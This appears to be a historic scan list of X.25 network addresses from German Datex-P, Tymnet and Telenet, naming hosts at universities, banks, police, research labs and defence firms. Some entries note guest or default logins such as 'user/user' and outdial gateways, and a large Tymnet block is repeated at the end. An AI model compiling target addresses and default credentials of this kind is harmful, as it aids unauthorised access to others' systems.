A 0262 452 110 40134               MCKDU VM/SP
I 0262 452 110 40211               Applid-Data-Research
I 0262 452 110 40325               OKI-GmbH
I 0262 452 110 90371               Software-Express
I 0262 452 210 0
Yr0262 452 210 40002               DIMDI Fep 1 Koeln
Ar0262 452 210 40004               Primenet (MicroVMS V4.5)
A 0262 452 210 40006               DIMDI Fep 2 Koeln  (Medical docs)
I 0262 452 210 40015               Kaufhof AG
I 0262 452 210 40027               ADAC
Ar0262 452 210 40035               Primenet
A 0262 452 210 40104               DIMDI1  (German Med. Inst., Koeln)
Yr0262 452 210 40119
O 0262 452 210 40136               AEG-Telefunken
I 0262 452 210 40202               Allianz RZ
I 0262 452 210 40203               Allianz RZ
I 0262 452 210 90265               RZ Uni Koeln
I 0262 452 210 90304               Allianz RZ
I 0262 452 210 90305               Allianz RZ
I 0262 452 210 90349               Kaufhof AG (RZ 2)
D 0262 452 210 90510               Geophysik und Meteorologie
Ir0262 452 210 93001               ?
A 0262 452 241 24104               VAX
A 0262 452 241 24105               GMD2
A 0262 452 241 24134               GMDZI
A 0262 452 280 40082               GMD (TSO)
A 0262 452 280 40187    BNVA       Bonn VAX (PI)
Ar0262 452 280 40191               Infas GmbH (VM)
D 0262 452 280 90020               Amtsgericht
A 0262 452 310 40003    EMX1       EMEX-Mailbox (Guest)
I 0262 452 310 40017               Primenet
O 0262 452 310 40103               AEG-Telefunken
A 0262 452 310 42100               Informatik
A 0262 452 310 42144    UNIDO      University of Dortmund
I 0262 452 310 40017               Primenet
I 0262 452 310 45100               Uni Dortmund (Siemens 7.760)
A 0262 452 310 9304                Dortmund
D 0262 452 340 40140               Primenet = RZU Bochum (CDL 855) ??
A 0262 452 340 40194    RUB        Cyber 205 (=855?), Ruhr University - Bochum
                                   (RUB)
D 0262 452 410 40149               Aachener + Muenchener Versicherung
I 0262 452 410 90014               ???
I 0262 452 410 90528               rmi-aachen
A 0262 452 410 90832               RMI Datentechnik Aachen
I 0262 452 433 40307               OPTEL (Ruehlemann-Box)
I 0262 452 461 90509               Kfz Juelich
A 0262 452 710 40240               Uni Siegen, FB Physik (VAX 11/750)
D 0262 452 931 40196               Handwerkskammer (HWK) Arnsberg
I 0262 453 000 0414                GFC-AG
D 0262 453 000 20104               Vax
D 0262 453 000 217      HMI        HMI in Berlin
A 0262 453 000 21711               Siemens
A 0262 453 000 21712               Siemens
A 0262 453 000 21713               Hahn-Meitner-Institut Berlin
D 0262 453 000 21714               ???
D 0262 453 000 40013               Uni Berlin
Y 0262 453 000 40014               GFC AG
Ar0262 453 000 40023    BERLIN     Tech. Univ. Berlin (Computer Science)
I 0262 453 000 40027               ADAC
I 0262 453 000 40112               ABC Barkredit Bank
I 0262 453 000 40166               David Verlag
I 0262 453 000 40509               COM-Box Berlin
A 0262 453 000 20205               CN01
A 0262 453 000 43109               netmbx, Berlin
A 0262 453 000 90055               COM.BOX, Berlin
A 0262 453 000 90864               ? (GUEST)
I 0262 453 002 17       HMI        Hans Mietner Institute in Berlin
I 0262 453 004 0023                Uni Berlin
I 0262 453 210 40017               tymnet-gateway
I 0262 454 000 30029
A 0262 454 000 30035               (immediately drops the line)
A 0262 454 000 30041               COM-PLETE (?) (command prefix is '*')
A 0262 454 000 30046               (immediately drops the line)
O 0262 454 000 30071
A 0262 454 000 30090               (cierr 1402)
A 0262 454 000 30104               ? ("INVALID COMMAND SYNTAX")
A 0262 454 000 30105
A 0262 454 000 30110               Host
A 0262 454 000 30113               (cierr 1402)
A 0262 454 000 30138               ? (no reaction)
D 0262 454 000 30150
D 0262 454 000 30158
A 0262 454 000 30175               ? ("INVALID COMMAND SYNTAX")
D 0262 454 000 30187               E2000 Hamburg VAX
O 0262 454 000 30201               Hasylab VAX (user/user)
A 0262 454 000 30202               HERA Magnet Measurement VAX 750 (=Krista
                                   Cryogenics Control ?)
A 0262 454 000 30215               ? ("INVALID COMMAND SYNTAX")
D 0262 454 000 30259
D 0262 454 000 30261
A 0262 454 000 30296               DFH2001I
A 0262 454 000 30502
I 0262 454 000 30519
A 0262 454 000 30566               DFH2001I
O 0262 454 000 30578               Primenet 20.0.4 DREHH
I 0262 454 000 40014               Hahn Egon RZ !! Code: EBCDIC !!
I 0262 454 000 40015               ???
Y 0262 454 000 40042               ???
D 0262 454 000 40044               Primenet MUF
I 0262 454 000 40053               SCHERAX
Y 0262 454 000 40078               ???
A 0262 454 000 40082               ? (no reaction)
I 0262 454 000 40103               Airbus
I 0262 454 000 40109               ???
I 0262 454 000 40111               BADGER
D 0262 454 000 40198               Argus IPP-Vax
I 0262 454 000 43100               ADV-Orga-Meyer & Co.
A 0262 454 000 50233               Altos Hamburg (althh) (Gast)
I 0262 454 000 8001     DYVA       MARK J VAX at DESY
I 0262 454 000 90047               AEG-Telefunken
A 0262 454 000 90092               Data-General
A 0262 454 000 90184               Uni Hamburg (VAX) (=UKE?)
I 0262 454 000 90194               Verbraucherbank AG
O 0262 454 000 90241               ???
I 0262 454 000 90258               Desy ( Vax )
I 0262 454 000 90558               Philips VAX
D 0262 454 000 90560    EMBLHH     EMBL VAX at Hamburg (Eur.Molecular
                                   Biol.Lab.)
I 0262 454 000 905602              ???
A 0262 454 000 90582               Desy V.24 Switch
A 0262 454 000 91110               Deutsche Mailbox 1
A 0262 454 000 91120               Deutsche Mailbox 2
A 0262 454 000 92210               DESYNET
A 0262 454 000 9306     DYVA       MARK J VAX at DESY
D 0262 454 103 90161               Astra Chemicals GmbH
  0262 454 106 40206               RCA
A 0262 454 210 40064               COMTES
O 0262 454 210 40108               AEG-Telefunken
I 0262 454 210 40145               AEG-Telefunken
Y 0262 454 210 40244               AEG-Telefunken
O 0262 454 210 42001               Bremen
I 0262 454 210 90302               Computerland VAX
O 0262 454 298 43070               Infex 2
I 0262 454 310 40545               Kiel IMF
A 0262 454 410 30033               Uni Oldenburg
I 0262 454 421 40045               ADV-Orga-Meyer & Co.
I 0262 454 488 40147               Essmann Getraenke GmbH
I 0262 455 110 40081               Airbus
I 0262 455 110 40171               Alli-Frischdienst
A 0262 455 110 42330               Uni Hannover (VM/370)
A 0262 455 110 43020               Nachrichtentechnik (VAX)
I 0262 455 110 701                 Uni Hannover
A 0262 455 110 90192               ???
A 0262 455 110 90835               CosmoNet (GAST)
A 0262 455 110 92200               RZ
D 0262 455 151 40212               AEG-Telefunken
I 0262 455 152 90154               Oldenburger Volksbank
I 0262 455 210 40562               Uni Bielefeld (CGK/TR440)
I 0262 455 251 90192               Paderborn
D 0262 455 251 90193               Paderborn
A 0262 455 251 93020               Uni Paderborn (4.3 BSD UNIX)
D 0262 455 362 90057               IUM
I 0262 455 410 40086               Alli-Frischdienst
I 0262 455 410 40162               RZ
I 0262 455 410 40560               Bibliothek
I 0262 455 421 043050              ORION
A 0262 455 510 32804               Uni Goettingen (choose VAX or IBM)
I 0262 455 521 90172               Spar & Darlehenskassen
I 0262 455 818 104                 Anders Frido GmbH
I 0262 455 910 40094               Essmann Getraenke GmbH
I 0262 455 931 40095               Ruhr AG
I 0262 456 061 40097               Polydress Plastic GmbH
I 0262 456 102 4301                DEC Frankfurt
I 0262 456 102 90145               Nadler-Werke GmbH
I 0262 456 103 40332               Amann KG
I 0262 456 104 0250                Tymnet
A 0262 456 106 40254               Alfa Service Partner (Primenet)
I 0262 456 106 90119               Alfa Service Partner
I 0262 456 110 40009               IBM  Centre for Info and Doc, Germany
I 0262 456 110 40037               Control Data (Test.-Serv.C4,ZZA201,CDC)
I 0262 456 110 40076               Autonet
I 0262 456 110 40105               Nixdorf Computer
I 0262 456 110 40106               Nixdorf Computer
I 0262 456 110 40107               CN01
I 0262 456 110 40187               WAX Bank FRA
I 0262 456 110 40240               City-Bank FFM (Uni Bochum ??)
I 0262 456 110 40245               ??
I 0262 456 110 40250               Tymnet (Id=Information)
I 0262 456 110 40303               American Express
I 0262 456 110 40305               American Express
I 0262 456 110 40311               AMC
I 0262 456 110 40365               AMP
I 0262 456 110 90211               Nixdorf Computer
I 0262 456 110 90212               Nixdorf Computer
I 0262 456 110 90322               American Express
I 0262 456 110 90347               American Express
I 0262 456 121 40207               ADV-Orga-Meyer & Co.
I 0262 456 121 40217               BKA
I 0262 456 121 40225               BKA
I 0262 456 121 90580               BKA
I 0262 456 131 40138               Uni Mainz RZ
I 0262 456 131 40545               RZ
Y 0262 456 131 90031               Allg.Kreditversicherung
Y 0262 456 151 40282               ???
A 0262 456 151 40516               Uni Darmstadt (Siemens 7.xxx)
A 0262 456 151 40547               GSI Darmstadt (EMMA-VAX 8600)
A 0262 456 151 42807               GMD Darmstadt (CADMUS 9240)
I 0262 456 172 90070               A-Kredit
I 0262 456 193 40082               Apotheken Marketing
D 0262 456 196 40095               Data General Schwalbach
A 0262 456 196 40107               Int.Doc.Chem.
A 0262 456 210 40000               Telebox der DBP (ID INF100,Telebox)
A 0262 456 210 40014               ACF/VTAM
A 0262 456 210 40025               Oeva
A 0262 456 210 40026               HOST
D 0262 456 210 40027               BASF/FER.VAX 8600
I 0262 456 210 40097               Nadler-Werke GmbH
I 0262 456 210 40217               Primenet
I 0262 456 210 40324               Abacus
D 0262 456 210 40508               VCON0.BASF.A6
A 0262 456 210 40516               CN01
A 0262 456 210 40532
A 0262 456 210 40580               DYNAPAC MULTI-PAD.25
A 0262 456 210 40581               DYNAPAC MULTI-PAD.25
A 0262 456 210 40582
A 0262 456 210 90000               Telebox der DBP
I 0262 456 221 3002     EMBL       European Microbiology Lab (or European
                                   Molecular Biological Lab.) (=ALKOR?)
D 0262 456 221 40201               DKFZ (Heidelberg)
I 0262 456 221 40244               Franny (=Max Planck VAX=MPI?)
I 0262 456 310 40252
I 0262 456 310 421
D 0262 456 310 424
I 0262 456 310 4302
I 0262 456 340 40136               Nadler-Werke GmbH
A 0262 456 410 30021               HRZ-Giessen
I 0262 456 410 40142               Aachener + Muenchener Versicherung
A 0262 456 410 90040               HRZ Giessen (CDCNET-X.25)
I 0262 456 410 90828               Ernaehrungswissenschaften
I 0262 456 441 90335               Leerwe GmbH
I 0262 456 615 142804              GMD, Darmstadt
A 0262 456 673 13330               Geonet 1 (ex IMCA)
A 0262 456 673 13340               Geonet 3
I 0262 456 673 30070               IMCA-Mailbox, Solmser Str. 16, D-6419
                                   Haunetal-Staerklos
I 0262 456 721 40305               Alfa Metalcraft Corp.
I 0262 456 810 40010               Teleprint Saarbrueckener Zeitung
I 0262 456 810 40071               Nadler-Werke GmbH
I 0262 456 810 40076    SAARBRU    Univ of Saarbruecken (Saarland RZ)
A 0262 456 900 10174               Beilstein Gmelin RZ (COMDOS ?)
O 0262 456 900 10552               FIZ-Technik
O 0262 456 900 30040               Nixdorf Computer
A 0262 456 900 40076               Autonet
D 0262 456 900 40106               Nixdorf
I 0262 456 900 40505               AEG-Telefunken
  0262 456 900 40506               AEG-Telefunken
A 0262 456 900 90125
I 0262 456 900 90506               Nixdorf
I 0262 456 900 9308                SYNTAX
I 0262 457 010 40025               ?
A 0262 457 071 40266               Zentrum fuer Datenverarbeitung
  0262 457 071 40529               Zentrale Verw.
  0262 457 071 90182               ADW-Wirtschaftsberatung
D 0262 457 071 90249               Bibliothek
D 0262 457 110 10023               Hohenheim Bibliothek
D 0262 457 110 211                 Rechenzentrum
Dr0262 457 110 40028
Dr0262 457 110 40035               Primenet !! No CTRL-P clr !!
B 0262 457 110 40124               Stahl EDV-Service
  0262 457 110 40129               Allg.Rentenanstalt
  0262 457 110 40147               MAHU Verlag
D 0262 457 110 90059               Bibliothek
  0262 457 110 90103               Data General
  0262 457 110 90246               Hohenheim DokumentationsSt.
D 0262 457 110 90316               RMI-Net
  0262 457 110 90557               Stahl EDV-Service
A 0262 457 110 90593               Unix, Informatik (ifistg)
  0262 457 141 90098               Aigner Buchhandlung
X 0262 457 210 40002               V750
Br0262 457 210 40025               Badenia
  0262 457 210 40031               IITB-Datenverarbeitung
D 0262 457 210 40135               Fraunhofer Institut
C 0262 457 210 40189               Uni Karlsruhe, RZ (until 10-APR-88)
X 0262 457 210 40248               Uni Karlsruhe, LINK (=NETONE?)
A 0262 457 210 42100               Uni Karlsruhe, IRAV2 (VAX 8200)
A 0262 457 210 42140               Uni Karlsruhe, RZ (since 11-APR-88)
D 0262 457 210 4303                Telematik
A 0262 457 247 40001               INKA  FIZ-Chemie 2 (German Centre for
                                   Tech.?)
A 0262 457 247 40141               INKA  FIZ-Chemie 1
A 0262 457 247 40211    CASGER     STN Internat. Karlsruhe
D 0262 457 310 90269               RZ Bereich OE
  0262 457 310 921                 RZ
  0262 457 351 40032               AFD-Arbeitsgruppe F.DV
A 0262 457 531 90008               Informationswissenschaften
D 0262 457 531 90094               RZ
  0262 457 552 90320               Alno-Moebel
D 0262 457 610 300                 Uni Freiburg, 9600bps
D 0262 457 610 370                 Uni Freiburg, Sperry Univac
D 0262 457 610 40079               Albert Ludwig, Uni-Bibliothek
  0262 457 610 40166               AEG-Telefunken
  0262 457 610 40306               Alpha-Buch GmbH
B 0262 457 610 420                 Uni Freiburg, 4800bps
B 0262 457 610 480                 Uni Freiburg, Sperry Univac
X 0262 457 610 520                 Uni Freiburg, Uni Bibliothek
  0262 457 641 40265               Anders Ernst
  0262 457 721 40071               Kienzle Computer
  0262 457 721 40072               Kienzle Computer
  0262 457 721 40171               Kienzle Computer
  0262 457 721 90004               Kienzle Computer
  0262 457 721 90226               Kienzle Computer
  0262 457 810 40222               Dietrich Georg GmbH
B 0262 458 151 40114               Kejo GmbH (Josef Keller)
D 0262 458 210 40114               Bibliothek
  0262 458 210 40120               NCR
  0262 458 510 30236               Passau RZ
D 0262 458 710 40171               Transfer Data Test GmbH
  0310 600 021 0                   Procter and Gamble
  0310 600 022 6                   Anistics
  0310 600 022 6                   Interactive Market Systems (Anistics)
  0310 600 023 2                   Scientific Timesharing
  0310 600 024 2                   Timesharing Resources
  0310 600 025 2                   Computer Science Corporation
  0310 600 025 5                   Timesharing Associates
  0310 600 027 6                   Management Decision Systems Inc
  0310 600 028 8                   SRI
  0310 600 028 8                   SRI San Francisco (UNIX)
  0310 600 028 8                   Stanford Research Institute (SRI)
  0310 600 030 3                   Scientific Timesharing
  0310 600 030 7                   Infomedia Corporation
  0310 600 032 3                   TRW Defence & Space Systems Group
  0310 600 040 1                   TMCS Public Network
  0310 600 043 2                   Interactive Market Systems
  0310 600 046 6                   Bibliographic Retrieval Services
B 0310 600 058 1                   BRS
  0310 600 063 3                   Public TYMNET/TRWNET Interlink
  0310 600 079 3                   J&J Host
B 0310 600 105 3
  0310 600 133 0                   MULTICS, HVN 862-3642
  0310 600 140 0                   TMCS Public Network
B 0310 600 150 9                   Orbit (SDC)
B 0310 600 157 878                 BIX
D 0310 600 165 9                   BYTE Information Exchange (GUEST,GUEST)
A 0310 600 166 3                   People Link
  0310 600 181 9                   TMCS Public Network
  0310 600 182 8        FRX        Faifax Outdial Host (Tymnet)
  0310 600 186 4                   SUNGARDS Central Computer Facility Networks
  0310 600 189 2                   Primenet (certain hours)
B 0310 600 195 2                   VAX
B 0310 600 197 6                   Outdial NY
A 0310 600 197 7
  0310 600 209 5                   COMODEX Online System
  0310 600 209 8                   D & B
  0310 600 209 9                   D & B
  0310 600 210 0                   D & B
  0310 600 210 9                   TYMNET/15B (inter-link)
B 0310 600 220 7,OUT               Outdial
  0310 600 228 6                   Primenet TFGI
  0310 600 229 9                   CONSILIUM
  0310 600 232 901*D    MFE        Magnetic Fusion Energy Centre, Lawrence
                                   Livermore
B 0310 600 236 1                   Denver Oil&Gas
  0310 600 241                     Bank Of America
  0310 600 245 3                   Primenet
B 0310 600 254 5        SEISMO     Centre for Seismic Studies
B 0310 600 255                     Outdial NY
A 0310 600 262 3                   VAX/VMS (GUEST ???)
B 0310 600 262 3003                VTINET
B 0310 600 262 460                 SUMEX
B 0310 600 263 5                   QUOTRON Wall Street (Boerse n.y.)
B 0310 600 266 400      SLAC       SLAC on Tymnet
B 0310 600 267 7                   The New York Times
  0310 600 269 4                   PVM3101,SPDS/MTAM, MLCM,VM/SP,STRATUS-1,
                                   STRATUS-2
  0310 600 279 0                   VM/370
  0310 600 286 4                   RCA Semicustom
B 0310 600 302 70000               VTI NETONE
  0310 600 307 9                   VM/370
  0310 600 309 2                   TYMNET/Protected Access Service Sys.
                                   Inter-link
  0310 600 316 8                   VM/370
  0310 600 321 4                   VM/370
  0310 600 322 0                   VM/370
  0310 600 322 1                   VM/370
  0310 600 357 2                   NORTH AMERICA DATA CENTRE
  0310 600 360 4                   VM/370
  0310 600 404 1                   RCA GLOBCOM'S PACKET SWITCHING SERICE
A 0310 600 412 9                   ?
A 0310 600 413 1                   ?
  0310 600 413 7                   TSO, VM/370
  0310 600 416 300                 Oakridge, Tennessee
  0310 600 417 4                   VM/370
  0310 600 420 6                   MAINSTREAMS
  0310 600 423 500                 Oakridge, Tennessee
B 0310 600 430 5                   BIOVAX
  0310 600 434 1                   (Host) 2 - VM/370, T - VM/370,1,3,4,A,C,E,Z
A 0310 600 436 5                   Toxnet (NLM=National Lib. of Medicine's)
B 0310 600 455 5                   VAX
  0310 600 459 97
  0310 600 474 3                   TYMNET Info Service
X 0310 600 502 0                   Outdial Fairfax
  0310 600 522 9                   Uni.of Pencilvania School of Arts and
                                   Science
  0310 600 526 7                   CHANEL 01
X 0310 600 531 7                   Outdial St.Louis
B 0310 600 532 0                   DEC Soft. Serv.
  0310 600 556 9                   STRATUS/32
  0310 600 557 1                   STRATUS/32
  0310 600 560 3                   (Host) systems 1,2,3,4,5,C (5=Outdial)
B 0310 600 562 200      FNAL       Fermilab
B 0310 600 562 226                 Fermilab 2
B 0310 600 578 78                  BIX
B 0310 600 584 401                 Washington Post
B 0310 600 61           DIALOG1    Lockheed Info Systems
  0310 600 61*DSDDIPSSL ORBIT2     SDC Search Service
  0310 600 628 1                   EDCS
  0310 600 628 3                   EDCS
  0310 600 643 2                   EASYLINK
  0310 600 643 4                   EASYLINK
  0310 600 672 2                   International Network
  0310 600 68                      Stanford SUMEX-AIM. Tenex op syst.
  0310 600 683 2                   A&A DATANET (Systems 1,8,0,14)
X 0310 600 701 7                   Outdial NY
  0310 600 759 6                   (Host)  A - VM/370, B - VM/370
? 0310 600 787                     Dallas
  0310 601 79                      Berkley Univ.
  0310 602 88                      Stanford Research Institute
B 0310 611 467                     Cas Online Sys.
  0310 614 67                      Ohio CAS (Chemical Abstracts Service)
  0310 617 001 38                  Multics
  0310 647 911 065                 BIX Lexington Data Service
  0310 690 006 1*D      DIALOG4    Lockheed DIALOG service
B 0310 690 080 3*D      DIALOG3    Lockheed DIALOG service
  0310 690 762 6                   Emery ADO
  0311 0                TELENET    USA - Telenet
B 0311 002 130 0039                ECLD
  0311 020 100 02000               Insco Systems
  0311 020 100 022                 New Jersey Outdial 2400 bps (Area 201)
  0311 020 100 02300               American Information Services
  0311 020 100 02400               The Information Bank
  0311 020 100 02500               New Jersey Institute of Technology
  0311 020 100 02800               Olcott International Company
  0311 020 100 03700               Informatics Inc
  0311 020 100 169      MOUTON
  0311 020 100 301                 New Jersey Outdial 1200 bps (Area 201)
  0311 020 101 59200               Scientific Process & Research Inc
  0311 020 200 02100               Scientific Timesharing
  0311 020 200 02200               Scientific Timesharing
X 0311 020 200 066                 Air Force
T 0311 020 200 099      ICIB       Information Council Incorporated B system
  0311 020 200 1        TELEMAIL   US Telemail facility
X 0311 020 200 10900    CIS        Chemical Information Systems
A 0311 020 200 115                 Outdial 300 bps (Area 202)
A 0311 020 200 116                 Outdial 1200 bps (Area 202)
  0311 020 200 117                 Distr. of Columbia Outdial 2400 bps (Area
                                   202)
B 0311 020 200 141      TELEMAIL   US Telemail facility (GT-Net)
  0311 020 200 14175    TELEENQ    Telenet Enquiry Service
  0311 020 200 14175    TELEMAIL1  US Telemail facility
  0311 020 200 14275    TELENET    US Telenet
  0311 020 201 19500               Gallaude College Computer Centre
  0311 020 300 06400               NCSS Bureau
  0311 020 300 130                 Connecticut Outdial 1200 bps (Area 203)
  0311 020 301 78900               Yale University Computer Centre
  0311 020 400 02900    WATERLO    University of Waterloo
  0311 020 600 019                 Washington Outdial 1200 bps (Area 206)
  0311 021 200 02000               Bowne Timesharing
  0311 021 200 02500               Interactive Market Systems (Anistics)
  0311 021 200 02800               Burroughs Corp (NYC data centre)
  0311 021 200 141      JPLM1      Jet Propulsion Laboratory mail 1, USA
  0311 021 200 142      JPLM2      Jet Propulsion Laboratory mail 2, USA
  0311 021 200 14200               GT-Net Telemail
A 0311 021 200 315                 Outdial 300 bps (Area 212)
A 0311 021 200 316                 Outdial 1200 bps (Area 212)
D 0311 021 200 412                 Outdial 2400 bps (Area 212)
D 0311 021 200 41200               New York City Outdial (Area 212)
  0311 021 201 39200               Memorial Dose Distribution Computation
                                   Service
  0311 021 201 40600               MAV Systems (300 bps)
  0311 021 201 57800               IP Sharp Associates
  0311 021 201 58000               SDL International (1200 bps)
  0311 021 201 58500               SDL International (300 bps)
  0311 021 201 58800               DSL Systems Inc
  0311 021 201 59500               SDL International (1200 bps)
  0311 021 201 62000               Telestat System Inc
  0311 021 201 62700               Telestat Systems Inc
  0311 021 300 02200               Interactive Systems Corporation
  0311 021 300 02700               Mellonics Information Centre
  0311 021 300 029                 TRW Defence & Space Systems Group
B 0311 021 300 03300    ORBIT      Orbit
  0311 021 300 03300*D  ORBIT      SDC Search Service (300 bps)
  0311 021 300 04400               SDC Search Service (1200 bps)
B 0311 021 300 039      USCAL2     Univ. of Southern California
  0311 021 300 04114    IHW        IHW
  0311 021 300 04700               University of Southern California
B 0311 021 300 048      USCAL1     University of Southern California
B 0311 021 300 170                 LRS Dialog 2
T 0311 021 300 17000    DIALOG5    Lockheed Info Systems
  0311 021 300 17000*D  DIALOG2    Lockheed DIALOG service
B 0311 021 300 219      CALTECH    Caltech VAX 11/780
  0311 021 300 21908    CALTECH    Caltech VAX 11/780
  0311 021 300 21909    CALTECH2   Caltech VAX 11/780
  0311 021 300 412                 California Outdial 1200 bps (Area 213)
A 0311 021 300 413                 Outdial CA
  0311 021 300 668                 Adainfo
  0311 021 301 353      UCLA       UCLA, USA
  0311 021 301 40300               Marshall & Swift Publication
  0311 021 400 117                 Outdial 300 bps (Area 214)
A 0311 021 400 118                 Texas Outdial 1200 bps (Area 214)
  0311 021 500 022                 Pennsylvania Outdial 2400 bps (Area 215)
  0311 021 500 112                 Pennsylvania Outdial 1200 bps (Area 215)
A 0311 021 600 020                 Outdial 300 bps (Area 216)
A 0311 021 600 021                 Ohio Outdial 1200 bps (Area 216)
  0311 021 700 021                 University of Illinois - Urbana
  0311 030 100 02000    NLM        National Library of Medicine
A 0311 030 100 02400               The Source
B 0311 030 100 038                 The Source (ID BSC131 SR3811)
B 0311 030 100 243                 ITT Dialcom
  0311 030 100 364                 Primesoft
A 0311 030 100 38                  The Source
B 0311 030 100 633                 Toxnet (NLM)
  0311 030 101 26500               Informatics Inc
  0311 030 300 02000               Computer Sharing Services
  0311 030 300 021                 Colorado Outdial 2400 bps (Area 303)
  0311 030 300 02300               Broker Services Inc
  0311 030 300 115                 Colorado Outdial 1200 bps (Area 303)
  0311 030 301 13100               EDI Computer Services
  0311 030 301 13200               EDI Computer Services
  0311 030 301 13300               Energy Enterprises
  0311 030 500 121                 Florida Outdial 1200 bps (Area 305)
  0311 030 501 16300               Florida Computer Inc
D 0311 030 508 793                 Miami Outdial (Area 305) ?
  0311 031 200 02200               National Computer Network of Chicago
  0311 031 200 024                 Illinois Outdial 2400 bps (Area 217 ?)
  0311 031 200 03100               Continental Bank
  0311 031 200 03200               Continental Bank
  0311 031 200 04900               American Hospital Supply Corporation
  0311 031 200 411                 Illinois Outdial 1200 bps (Area 217 ?)
  0311 031 201 07300               Commodity Information Services
  0311 031 268 801      ADPUSA     ADP Network Services Ltd.
  0311 031 300 024                 Michigan Outdial 2400 bps (Area 313)
  0311 031 300 04000               ADP Network Services
  0311 031 300 06200               Merit International (MIT)
  0311 031 300 216                 Michigan Outdial 1200 bps (Area 313)
  0311 031 301 39800               Merit Computer
  0311 031 400 07200               Environmental DataNetwork Inc.
  0311 031 401 06500               McDonnel Douglas Automation (300 bps)
  0311 031 401 06600               McDonnel Douglas Automation (110 bps)
  0311 031 401 06700               McDonnel Douglas Automation (1200 bps)
  0311 031 401 61000               McDonnel Douglas Automation (300 bps)
  0311 031 500 02000               Bibliographic Retrieval Services
A 0311 040 100 612                 Modemcity
A 0311 040 400 114                 Georgia Outdial 1200 bps (Area 404)
A 0311 040 800 021                 California Outdial 1200 bps? (Area 408)
  0311 040 800 245                 Bridge
B 0311 040 800 246                 SCF
  0311 041 201 4600                On-Line Systems Inc
  0311 041 400 02000               A.O. Smith Data Systems Divisions
  0311 041 400 021                 Wisconsin Outdial 1200 bps (Area 414)
B 0311 041 500 020                 LRS-Dialog 2
A 0311 041 500 02000    DIALOG     Lockheed Information Systems
  0311 041 500 02000*D  DIALOG     Lockheed DIALOG service
B 0311 041 500 048                 LRS Dialog 2
  0311 041 500 04800    DIALOG2    Lockheed Information Systems 2
  0311 041 500 04800*D  DIALOG1    Lockheed DIALOG service
  0311 041 500 117                 California Outdial 1200 bps (Area 415)
I 0311 041 500 210                 Outdial USA
A 0311 041 500 215                 Outdial (Area 415)
A 0311 041 500 217                 Outdial (Area 415)
A 0311 041 500 220                 Outdial 1200 bps (Area 415)
  0311 041 500 48000               Lockheed Information Systems (?)
B 0311 041 500 607                 BIONET
B 0311 041 500 609                 INTELLIGENETICS
  0311 041 501 23600               Hydrocomp Inc (300 bps)
  0311 041 501 23700               Hydrocomp Inc (1200 bps)
  0311 041 501 26800               ITEL Corp (300 bps)
  0311 041 501 26900               ITEL Corp (1200 bps)
  0311 041 501 59700               Stanford Library Centre for Inform
                                   Processing
  0311 041 501 59700               Standard Centre for Information Processing
O 0311 050 006 1                   Nuclear Research
A 0311 050 300 020                 Outdial 300 bps (Area 503)
A 0311 050 300 021                 Oregon Outdial 1200 bps (Area 503)
B 0311 050 500 060                 ICN (=LASL)
  0310 600 021 0                   Procter and Gamble
  0310 600 022 6                   Anistics
  0310 600 022 6                   Interactive Market Systems (Anistics)
  0310 600 023 2                   Scientific Timesharing
  0310 600 024 2                   Timesharing Resources
  0310 600 025 2                   Computer Science Corporation
  0310 600 025 5                   Timesharing Associates
  0310 600 027 6                   Management Decision Systems Inc
  0310 600 028 8                   SRI
  0310 600 028 8                   SRI San Francisco (UNIX)
  0310 600 028 8                   Stanford Research Institute (SRI)
  0310 600 030 3                   Scientific Timesharing
  0310 600 030 7                   Infomedia Corporation
  0310 600 032 3                   TRW Defence & Space Systems Group
  0310 600 040 1                   TMCS Public Network
  0310 600 043 2                   Interactive Market Systems
  0310 600 046 6                   Bibliographic Retrieval Services
B 0310 600 058 1                   BRS
  0310 600 063 3                   Public TYMNET/TRWNET Interlink
  0310 600 079 3                   J&J Host
B 0310 600 105 3
  0310 600 133 0                   MULTICS, HVN 862-3642
  0310 600 140 0                   TMCS Public Network
B 0310 600 150 9                   Orbit (SDC)
B 0310 600 157 878                 BIX
D 0310 600 165 9                   BYTE Information Exchange (GUEST,GUEST)
A 0310 600 166 3                   People Link
  0310 600 181 9                   TMCS Public Network
  0310 600 182 8        FRX        Faifax Outdial Host (Tymnet)
  0310 600 186 4                   SUNGARDS Central Computer Facility Networks
  0310 600 189 2                   Primenet (certain hours)
B 0310 600 195 2                   VAX
B 0310 600 197 6                   Outdial NY
A 0310 600 197 7
  0310 600 209 5                   COMODEX Online System
  0310 600 209 8                   D & B
  0310 600 209 9                   D & B
  0310 600 210 0                   D & B
  0310 600 210 9                   TYMNET/15B (inter-link)
B 0310 600 220 7,OUT               Outdial
  0310 600 228 6                   Primenet TFGI
  0310 600 229 9                   CONSILIUM
  0310 600 232 901*D    MFE        Magnetic Fusion Energy Centre, Lawrence
                                   Livermore
B 0310 600 236 1                   Denver Oil&Gas
  0310 600 241                     Bank Of America
  0310 600 245 3                   Primenet
B 0310 600 254 5        SEISMO     Centre for Seismic Studies
B 0310 600 255                     Outdial NY
A 0310 600 262 3                   VAX/VMS (GUEST ???)
B 0310 600 262 3003                VTINET
B 0310 600 262 460                 SUMEX
B 0310 600 263 5                   QUOTRON Wall Street (Boerse n.y.)
B 0310 600 266 400      SLAC       SLAC on Tymnet
B 0310 600 267 7                   The New York Times
  0310 600 269 4                   PVM3101,SPDS/MTAM, MLCM,VM/SP,STRATUS-1,
                                   STRATUS-2
  0310 600 279 0                   VM/370
  0310 600 286 4                   RCA Semicustom
B 0310 600 302 70000               VTI NETONE
  0310 600 307 9                   VM/370
  0310 600 309 2                   TYMNET/Protected Access Service Sys.
                                   Inter-link
  0310 600 316 8                   VM/370
  0310 600 321 4                   VM/370
  0310 600 322 0                   VM/370
  0310 600 322 1                   VM/370
  0310 600 357 2                   NORTH AMERICA DATA CENTRE
  0310 600 360 4                   VM/370
  0310 600 404 1                   RCA GLOBCOM'S PACKET SWITCHING SERICE
A 0310 600 412 9                   ?
A 0310 600 413 1                   ?
  0310 600 413 7                   TSO, VM/370
  0310 600 416 300                 Oakridge, Tennessee
  0310 600 417 4                   VM/370
  0310 600 420 6                   MAINSTREAMS
  0310 600 423 500                 Oakridge, Tennessee
B 0310 600 430 5                   BIOVAX
  0310 600 434 1                   (Host) 2 - VM/370, T - VM/370,1,3,4,A,C,E,Z
A 0310 600 436 5                   Toxnet (NLM=National Lib. of Medicine's)
B 0310 600 455 5                   VAX
  0310 600 459 97
  0310 600 474 3                   TYMNET Info Service
X 0310 600 502 0                   Outdial Fairfax
  0310 600 522 9                   Uni.of Pencilvania School of Arts and
                                   Science
  0310 600 526 7                   CHANEL 01
X 0310 600 531 7                   Outdial St.Louis
B 0310 600 532 0                   DEC Soft. Serv.
  0310 600 556 9                   STRATUS/32
